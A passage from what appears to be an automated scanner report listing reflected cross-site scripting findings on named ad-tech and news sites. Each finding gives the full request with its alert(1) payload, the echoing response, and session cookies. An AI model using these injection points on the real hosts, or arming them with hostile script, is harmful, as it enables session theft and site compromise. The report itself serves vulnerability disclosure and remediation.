<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai7c2ca"-alert(1)-"ee03acab181/daa.php?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.147. http://nai.adtech.de/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e921f"-alert(1)-"33d594c5b01 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpe921f"-alert(1)-"33d594c5b01?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4E5FAC156E651A4418BD90FFF0106094

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:12:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:12:14 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpe921f"-alert(1)-"33d594c5b01?action_id=3&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.148. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38214"-alert(1)-"f12feb46ba8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai38214"-alert(1)-"f12feb46ba8/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:10:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:10:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai38214"-alert(1)-"f12feb46ba8/daa.php?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.149. http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6836"-alert(1)-"6f73bec262 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpd6836"-alert(1)-"6f73bec262?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.glb.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:11:28 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:11:29 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28275

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpd6836"-alert(1)-"6f73bec262?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.150. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50d49"-alert(1)-"3ed32da4bcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai50d49"-alert(1)-"3ed32da4bcd/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eadx=x; ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:14:18 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:14:18 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai50d49"-alert(1)-"3ed32da4bcd/daa.php?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName
...[SNIP]...

6.151. http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.tacoda.at.atwola.com
Path:   /nai/daa.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa787"-alert(1)-"41da85397bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/daa.phpfa787"-alert(1)-"41da85397bf?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675 HTTP/1.1
Host: nai.tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eadx=x; ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6

Response

HTTP/1.1 404 Not Found
Date: Sun, 04 Sep 2011 11:15:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 04 Sep 2011 11:15:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 28277

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/daa.phpfa787"-alert(1)-"41da85397bf?action_id=3&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5271675";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
...[SNIP]...

6.152. http://pixel.adsafeprotected.com/jspix [anId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5008"-alert(1)-"1bf4169bb16 was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140d5008"-alert(1)-"1bf4169bb16&pubId=11479&campId=4726 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DF6CC77EAEA9BC24AC2E7E96F398F579; Path=/
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 02:39:45 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140d5008"-alert(1)-"1bf4169bb16&pubId=11479&campId=4726",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsnryweo"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H
...[SNIP]...

6.153. http://pixel.adsafeprotected.com/jspix [campId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fccdb"-alert(1)-"d25d36213ca was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=11479&campId=4726fccdb"-alert(1)-"d25d36213ca HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EAC9C268E0448B35476A295A27B68B7D; Path=/
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 02:39:47 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=11479&campId=4726fccdb"-alert(1)-"d25d36213ca",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsnryxpe"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log",
...[SNIP]...

6.154. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8e56"-alert(1)-"acc731f922d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=11479&campId=4726&d8e56"-alert(1)-"acc731f922d=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=271FCB86246BD89C54F8347D56F41E27; Path=/
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 02:39:47 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=11479&campId=4726&d8e56"-alert(1)-"acc731f922d=1",
   debug : "false",
   allowPhoneHome : "true",
   phoneHomeDelay : "3000",
   asid : "gsnryydy"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log"
...[SNIP]...

6.155. http://pixel.adsafeprotected.com/jspix [pubId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6f98"-alert(1)-"55928a9ab42 was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=140&pubId=11479b6f98"-alert(1)-"55928a9ab42&campId=4726 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=331450ED87CFF9A066AA4D3E74250177; Path=/
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 02:39:46 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=140&pubId=11479b6f98"-alert(1)-"55928a9ab42&campId=4726",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsnryx15"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info
...[SNIP]...

6.156. http://rtb0.doubleverify.com/rtb.ashx/verifyc [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb0.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d1849<script>alert(1)</script>2f38dc06f94 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5641720&plc=68132397&sid=265920&num=5&ver=2&dv_url=http%3A//adstil.indiatimes.com/RealMedia/ads/adstream_sx.ads/www.timesofindia.com/TOI2009_City_Mumbai/index.html/1165705968@Top%3F&callback=__verify_callback_217917795060d1849<script>alert(1)</script>2f38dc06f94 HTTP/1.1
Host: rtb0.doubleverify.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/88918/233260/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=2733665-13225b1b58a-2854b473-10; __utma=209764608.1020985525.1314892399.1314892399.1314892399.1; __utmz=209764608.1314892399.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:267-HSA-807&token:_mch-doubleverify.com-1314892398926-27601

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Sun, 04 Sep 2011 02:39:44 GMT
Content-Length: 74

__verify_callback_217917795060d1849<script>alert(1)</script>2f38dc06f94(2)

6.157. http://social.ndtv.com/NDTVProfit [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /NDTVProfit

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e899"><script>alert(1)</script>f30e055d08d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /NDTVProfit?6e899"><script>alert(1)</script>f30e055d08d=1 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/home.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.4.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _SUPERFLY_nosample=1; PHPSESSID=06690e83b26d060ea9197b90799f6b1f; __utma=126395663.1992920947.1315103192.1315103192.1315103192.1; __utmb=126395663.5.10.1315103192; __utmc=126395663; __utmz=126395663.1315103192.1.1.utmcsr=ndtv.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142; _chartbeat2=efl9lo3odsxv1y4d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 62213
Expires: Sun, 04 Sep 2011 03:39:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 03:39:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<a href="/NDTVProfit&amp;6e899"><script>alert(1)</script>f30e055d08d=1&page=2">
...[SNIP]...

6.158. http://social.ndtv.com/groups.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /groups.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83e36"><script>alert(1)</script>6ca4221099d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /groups.php?83e36"><script>alert(1)</script>6ca4221099d=1 HTTP/1.1
Host: social.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Expires: Sun, 04 Sep 2011 04:19:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 04:19:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<fb:like href="http://social.ndtv.com/groups.php?83e36"><script>alert(1)</script>6ca4221099d=1" send="true" layout="box_count" width="100" show_faces="false" action="recommend" font="arial">
...[SNIP]...

6.159. http://social.ndtv.com/home.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /home.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df4e4"><script>alert(1)</script>b631d811bfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home.php?df4e4"><script>alert(1)</script>b631d811bfb=1 HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=126395663.1992920947.1315103192.1315103192.1315103192.1; __utmb=126395663.4.10.1315103192; __utmc=126395663; __utmz=126395663.1315103192.1.1.utmcsr=ndtv.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142; __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.4.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _chartbeat2=efl9lo3odsxv1y4d; _SUPERFLY_nosample=1

Response

